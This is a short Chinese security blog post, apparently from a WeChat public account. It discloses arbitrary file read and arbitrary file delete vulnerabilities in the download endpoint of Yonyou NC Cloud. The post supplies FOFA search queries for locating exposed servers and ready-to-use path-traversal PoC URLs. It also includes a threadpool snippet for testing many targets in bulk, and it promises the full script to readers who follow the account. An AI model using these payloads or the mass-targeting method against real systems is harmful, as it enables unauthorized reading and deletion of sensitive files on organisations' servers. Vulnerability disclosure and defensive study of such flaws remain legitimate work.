关注本公众号,长期推送漏洞文章
知攻善防实验室
红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。
73篇原创内容
公众号
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
简介
用友NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。
用友NC的download文件存在任意文件读取和任意文件删除漏洞,攻击者可以利用该漏洞读取或删除服务器上的敏感文件。
资产
fofa:app="用友-UFIDA-NC"
fofa:title="YONYOU NC"
漏洞复现
任意文件读取:
POC:
/portal/pt/xml/file/download?pageId=login&filename=..\index.jsp
任意文件删除:
/portal/pt/xml/file/download?pageId=login&filename=../index.jsp
区别在于"\"和"/"
直接拼接URL即可下载文件
批量测试:
通过线程池进行批量测试
with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:
executor.map(check_vulnerability, targets)
更改max_workers即可限制线程池数量
脚本获取地址:
关注本公众号"知攻善防实验室":后台回复"1107"获取
后台回复:“交流群”获取技术交流群链接